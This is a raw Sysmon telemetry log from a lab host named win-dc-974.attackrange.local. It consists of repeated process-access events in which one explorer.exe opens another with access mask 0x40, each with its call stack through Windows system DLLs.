16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 